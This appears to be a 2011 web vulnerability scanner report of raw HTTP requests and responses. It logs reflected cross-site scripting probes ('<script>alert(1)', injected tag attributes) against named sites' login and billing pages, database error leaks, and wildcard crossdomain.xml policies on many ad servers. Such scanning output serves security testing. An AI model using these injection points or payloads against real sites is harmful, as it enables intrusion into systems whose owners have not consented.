GET /button/?b=17de21%253e%253cscript Host: www.socialfollow.com Proxy-Connection: keep-alive Referer: http://www.socialfollow User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:38:00 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Content-Type: text/javascript Content-Length: 11681 <br/><b>Warning</b>:mysql ...[SNIP]... uranimatedegree=(1-Math ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.socialfollow |
Path: | /button/ |
GET /button/?b=1ae7c0%253cscript Host: www.socialfollow.com Proxy-Connection: keep-alive Referer: http://www.socialfollow User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:38:01 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Content-Type: text/javascript Content-Length: 11623 <br/><b>Warning</b>:mysql ...[SNIP]... <br/>var menu1ae7c0<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.socialfollow |
Path: | /button/css/ |
GET /button/css/?b=1e023e<a%20b%3dc Host: www.socialfollow.com Proxy-Connection: keep-alive Referer: http://www.socialfollow User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:38:07 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Content-Length: 4506 Content-Type: text/css div.sociallinks1e023e<a b=c>467568c8c1{position:absolute;left:0 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.socialfollow |
Path: | /button/css/ |
GET /button/css/?b=1&n=6 Host: www.socialfollow.com Proxy-Connection: keep-alive Referer: http://www.socialfollow User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:38:38 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Content-Length: 3887 Content-Type: text/css div.sociallinks1{position ...[SNIP]... g) no-repeat top left;} li a.c120{background:url li a.c93{background:url(http #sfWrapper1 .paddingSmall, div.sociallinks1 .paddingSmall{padding .socialFollowLink{width ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.socialfollow |
Path: | /login.php |
POST /login.php HTTP/1.1 Host: www.socialfollow.com Proxy-Connection: keep-alive Referer: http://www.socialfollow Cache-Control: max-age=0 Origin: http://www.socialfollow User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 Content-Length: 31 tEmail=Email7b249"><a%20b%3dc |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:37:57 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Set-Cookie: PHPSESSID=6ccca51566 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 4520 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <input name="tEmail" id="tEmail" type="text" value="Email7b249\"><a b=c>c89c9c10125" class="textBoxSize" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.taxnotebook |
Path: | /Login/PopupMessage.aspx |
GET /Login/PopupMessage.aspx Host: www.taxnotebook.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:50:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: SessionStateGUID=bcc55779 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 6745 <img src='../images/tnlogo.gif <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Tax Notebook</title> <LINK href="../Main.css" typ ...[SNIP]... </SCRIPT>7606E<SCRIPT>ALERT(1)< created. Log in with this user ID after you have disabled your pop-up blocker for Tax Notebook.</B> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://apps.sapha.com |
Path: | /appshandler.php |
GET /appshandler.php?ac=1&pid Host: apps.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:06:17 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: application/x-javascript Content-Length: 26970 var lastpageview_ID='110075' ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://apps.sapha.com |
Path: | /appshandler.php |
GET /appshandler.php?ac=2546 Host: apps.sapha.com Proxy-Connection: keep-alive Referer: http://tours.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:06:53 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: application/x-javascript Content-Length: 20423 var lastpageview_ID='68004' ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://hmficweb |
Path: | /billing_view/billingview |
GET /billing_view/billingview Referer: http://hmficweb User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hmficweb.hinghammutual Cookie: HinghamLoginError=Please Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:36:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 3987 Content-Type: text/html Set-Cookie: HinghamLoginError=; path=/billing_view Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <TITLE>The Hingham Group - Billing Details Access</TITLE> ...[SNIP]... <span class="errormsg">Please fill in all valuesbfa5c<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://hmficweb |
Path: | /billing_view/billingview |
GET /billing_view/billingview User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hmficweb.hinghammutual Cookie: HinghamLoginError=Please Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:35:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 3981 Content-Type: text/html Set-Cookie: HinghamLoginError=; path=/billing_view Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <TITLE>The Hingham Group - Billing Details Access</TITLE> ...[SNIP]... <span class="errormsg">Please fill in all values8da1d<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://hmficweb |
Path: | /billing_view/login.asp |
GET /billing_view/login.asp HTTP/1.1 Referer: http://hmficweb User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: hmficweb.hinghammutual Cookie: HinghamLoginError=Please Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:36:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 3981 Content-Type: text/html Set-Cookie: HinghamLoginError=; path=/billing_view Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <TITLE>The Hingham Group - Billing Details Access</TITLE> ...[SNIP]... <span class="errormsg">Please fill in all valuesadd2b<script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://seg.sharethis.com |
Path: | /getSegment.php |
GET /getSegment.php?purl=http Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://www.complianc User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __stid=CspT702sdV9LL |
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Sat, 07 May 2011 01:21:38 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 P3P: "policyref="/w3c/p3p.xml" Content-Length: 1368 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-type" content="text/html ...[SNIP]... <div style='display:none' userid: </div> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.expedia |
Path: | /app/answers/list/ |
GET /app/answers/list/ HTTP/1.1 Host: support.expedia.com Proxy-Connection: keep-alive Referer: http://support.expedia User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:42:29 GMT Server: Apache P3P: policyref="http://support Set-Cookie: cp_session=Vy0FcVYiA RNT-Time: D=341324 t=1304721749948953 RNT-Machine: 08 Vary: Accept-Encoding X-Cnection: close Content-Type: text/html; charset=UTF-8 Content-Length: 95330 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... upport:Search Results"; var s_pageNameOrig = s_pageName; s_server = "www.support.expedia.com" s_channel = "FAQ Support"; s_prop1 = ""; s_prop11 = ""; s_prop12 = "80312807C795402E93C s_account = "expedia1"; s_exp_account = s_account; s_pageType = ""; s_hier1 = "HTX," + s_channel; s_purchaseID = ""; s_products = ""; s_events = ""; s_currencyCode=""; s_eVar17= "FAQ Support ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.expedia |
Path: | /app/home/uurl/http%3A%2F |
GET /app/home/uurl/http%3A%2F Host: support.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:42:02 GMT Server: Apache P3P: policyref="http://support Set-Cookie: cp_session=BX9TJwx4A Set-Cookie: supportsurvey=1; expires=Fri, 13-May-2011 22:42:03 GMT; path=/; domain=support.expedia RNT-Time: D=486064 t=1304721722848302 RNT-Machine: 04 Vary: Accept-Encoding X-Cnection: close Content-Type: text/html; charset=UTF-8 Content-Length: 89132 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... = "FAQ Support:Launch"; var s_pageNameOrig = s_pageName; s_server = "www.support.expedia.com" s_channel = "FAQ Support"; s_prop1 = ""; s_prop11 = ""; s_prop12 = "80312807C795402E93C s_account = "expedia1"; s_exp_account = s_account; s_pageType = ""; s_hier1 = "HTX," + s_channel; s_purchaseID = ""; s_products = ""; s_events = ""; s_currencyCode=""; s_eVar17= "FAQ Support ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.expedia.com |
Path: | /default.asp |
GET /default.asp HTTP/1.1 Host: www.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Cteonnt-Length: 68427 Content-Type: text/html; Charset=iso-8859-1 Cache-Control: private Date: Fri, 06 May 2011 22:34:24 GMT Connection: close Vary: Accept-Encoding Content-Length: 68427 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <COMMENT TITLE="MO ...[SNIP]... <iframe src="http://fls ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: a.collective-media.net |
HTTP/1.0 200 OK Server: nginx/0.8.53 Content-Type: text/plain Content-Length: 187 Last-Modified: Tue, 31 Aug 2010 17:41:28 GMT Accept-Ranges: bytes Date: Sat, 07 May 2011 01:50:39 GMT Connection: close Set-Cookie: JY57=CT; expires=Sat, 04-Jun-2011 01:50:39 GMT; path=/; domain=.collective-media P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT" <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*" secure="false"/> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://a.rad.msn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: a.rad.msn.com |
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Thu, 14 Apr 2011 22:28:48 GMT Accept-Ranges: bytes ETag: "0d09952f3facb1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Access-Control-Allow Date: Fri, 06 May 2011 20:28:07 GMT Connection: keep-alive Content-Length: 202 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 258 Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT Date: Fri, 06 May 2011 21:50:02 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.doubleclick <cross-domain-policy> ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adsfac.us |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: adsfac.us |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT Accept-Ranges: bytes ETag: "0291dc9322c91:0" Server: Microsoft-IIS/7.0 P3P: CP="NOI DSP COR NID CUR OUR NOR" Date: Sat, 07 May 2011 01:50:17 GMT Connection: close Content-Length: 125 <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" secure="true" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://altfarm.mediaplex |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: altfarm.mediaplex.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"204-1289502469000" Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT Content-Type: text/xml Content-Length: 204 Date: Fri, 06 May 2011 21:50:13 GMT Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.facebook.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: api.facebook.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=2592000 Content-Type: application/xml Expires: Sun, 05 Jun 2011 21:06:48 GMT X-FB-Server: 10.32.16.127 Connection: close Content-Length: 280 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <site- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://apps.sapha.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: apps.sapha.com |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:43 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Sat, 13 Jun 2009 07:57:06 GMT ETag: "d30807e-140-2bd11880" Accept-Ranges: bytes Content-Length: 320 Vary: Accept-Encoding,User Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://as.casalemedia.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: as.casalemedia.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Fri, 25 Feb 2011 02:23:31 GMT ETag: "17b0daf-e6-41faec0" Accept-Ranges: bytes Content-Length: 230 Content-Type: text/xml Expires: Fri, 06 May 2011 20:28:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 06 May 2011 20:28:10 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Casale Media --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.rad.msn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: b.rad.msn.com |
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Thu, 14 Apr 2011 22:28:48 GMT Accept-Ranges: bytes ETag: "0d09952f3facb1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Access-Control-Allow Date: Fri, 06 May 2011 20:28:07 GMT Connection: keep-alive Content-Length: 202 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bh.contextweb.com |
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 ETag: W/"384-1279190954000" Last-Modified: Thu, 15 Jul 2010 10:49:14 GMT Content-Type: application/xml Content-Length: 384 Date: Fri, 06 May 2011 22:33:36 GMT Connection: Keep-Alive P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.contxtweb.com --> <cross-domain-policy> <site-contro ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c.scout.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: c.scout.com |
HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate Pragma: no-cache Content-Type: text/xml Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT Accept-Ranges: bytes ETag: "044698a197dcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Fri, 06 May 2011 19:29:07 GMT Connection: keep-alive Content-Length: 109 <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn-cms.scout.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn-cms.scout.com |
HTTP/1.0 200 OK Content-Type: text/xml Content-Location: http://cdn-cms.scout.com Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT ETag: "01f3482dc3fcb1:67b" Server: Microsoft-IIS/6.0 Server: Scoutweb10 X-Powered-By: ASP.NET Date: Fri, 06 May 2011 19:29:03 GMT Content-Length: 222 Connection: close Akamai: True <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.eyewonder.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn.eyewonder.com |
HTTP/1.0 200 OK Cache-Control: max-age=18000 Content-Type: text/xml Accept-Ranges: bytes ETag: "b2ae8e693141c91:139e" Server: Microsoft-IIS/6.0 p3p: policyref="/100125/w3c X-Powered-By: ASP.NET Date: Fri, 06 May 2011 19:31:59 GMT Last-Modified: Fri, 07 Nov 2008 23:34:43 GMT Expires: Sat, 07 May 2011 00:31:59 GMT Content-Length: 195 Connection: close <?xml version="1.0"?> <!-- http://cdn.eyewonder.com- <cross-domain-policy> <allow-access-from domain="*" /> <site-control permitted-cross-domain </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.gigya.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cdn.gigya.com |
HTTP/1.0 200 OK Content-Length: 355 Content-Type: text/xml Last-Modified: Thu, 31 Mar 2011 14:23:28 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 x-server: web102 P3P: CP="IDC COR PSA DEV ADM OUR IND ONL" X-Powered-By: ASP.NET Cache-Control: max-age=86400 Date: Sat, 07 May 2011 01:57:55 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" to-ports="80" /> ...[SNIP]... <allow-access-from domain="*" to-ports="443" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://clk.atdmt.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: clk.atdmt.com |
HTTP/1.1 200 OK Content-Length: 207 Content-Type: image/gif Date: Sat, 07 May 2011 01:22:04 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cu1.activalive.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cu1.activalive.com |
HTTP/1.1 200 OK Content-Type: application/xml Connection: close Content-Length: 272 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <site-control ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d.xp1.ru4.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: d.xp1.ru4.com |
HTTP/1.1 200 OK Server: Sun-Java-System-Web Date: Fri, 06 May 2011 22:33:37 GMT P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI" Content-type: text/xml Last-modified: Mon, 22 Nov 2010 21:31:41 GMT Content-length: 202 Etag: "ca-4ceae13d" Accept-ranges: bytes Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://depot.activalive |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: depot.activalive.com |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:18:17 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Mon, 26 Apr 2010 17:55:31 GMT ETag: "1a40b74-98-485277b9dcac0 Accept-Ranges: bytes Content-Length: 152 Connection: close Content-Type: text/xml <cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://fls.doubleclick |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: fls.doubleclick.net |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Fri, 06 May 2011 02:37:40 GMT Expires: Sat, 30 Apr 2011 02:36:16 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 71756 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.doubleclick <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://haymarketbusi |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: haymarketbusinesspub |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:50:03 GMT Server: Omniture DC/2.0.0 xserver: www260 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ib.adnxs.com |
